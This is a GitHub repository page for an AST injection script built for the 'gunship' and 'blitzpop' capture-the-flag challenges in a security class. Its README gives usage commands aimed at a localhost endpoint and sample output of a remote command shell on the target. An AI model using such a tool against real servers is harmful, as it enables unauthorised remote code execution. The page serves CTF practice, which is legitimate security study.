Skip to content

willful759/AST_Injection

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
README.md
README.md
 
 
blitz.json
blitz.json
 
 
gun.json
gun.json
 
 
script.py
script.py
 
 

Repository files navigation

AST Injection script

Small script used for the gunship and blitzpop ctfs,extended to be a little more flexible.

Installation

If you want better error reports, you'll need the beautifulsoup4 package, but it's not necessary.

pip install beautifulsoup4

Otherwise, just clone the repo into any folder you like.

Usage

Use the -u,--url flag to specify a domain to attack,and optionaly, add any extra JSON that you need with the -j,--json flag.

Example

python script.py -u "http://localhost:1337/api/submit" -j blitz.json

If needed, you can just write the JSON object

python script.py --url "http://localhost:1337/api/submit" --json '{artist.name: "Haigh"}'

Once you run the script, you should se a command line that allows you to run code on the attacked machine

$ python script.py --url "http://localhost:1337/api/submit" --json '{"artist.name": "Haigh"}'
	>id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)

	>ls
flagnjEYE
index.js
node_modules
package.json
routes
static
views
yarn.lock

	>exit

Goodbye!
$

About

AST injection script for my security class

Resources

Readme
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages